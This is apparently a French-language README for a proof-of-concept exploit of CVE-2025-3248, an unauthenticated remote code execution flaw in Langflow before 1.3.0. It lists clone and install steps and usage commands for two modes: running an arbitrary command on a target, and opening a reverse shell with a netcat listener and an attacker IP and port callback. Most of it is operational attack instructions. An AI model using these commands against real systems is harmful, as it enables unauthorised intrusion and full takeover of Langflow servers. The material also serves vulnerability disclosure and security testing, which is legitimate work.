
PoC pour CVE-2025-3248 : RCE non authentifiée dans Langflow < 1.3.0 via /api/v1/validate/code.
Un exploit de type preuve de concept démontrant une vulnérabilité d'exécution de code à distance dans l'endpoint de validation de code de Langflow. Cette vulnérabilité affecte les versions de Langflow antérieures à 1.3.0, permettant à des attaquants non authentifiés d'exécuter du code arbitraire via des requêtes HTTP spécialement conçues.
/api/v1/validate/coderequestscoloramagit clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
pip install requests colorama
L'exploit prend en charge deux modes de fonctionnement :
Exécute une seule commande sur le système cible :
python3 cve-2025-3248.py cmd <target_url> "<command>"
Exemple :
python3 cve-2025-3248.py cmd http://target:7860 "id"
Déclenche un shell inversé interactif :
nc -lvnp 4444
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>
Exemple :
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444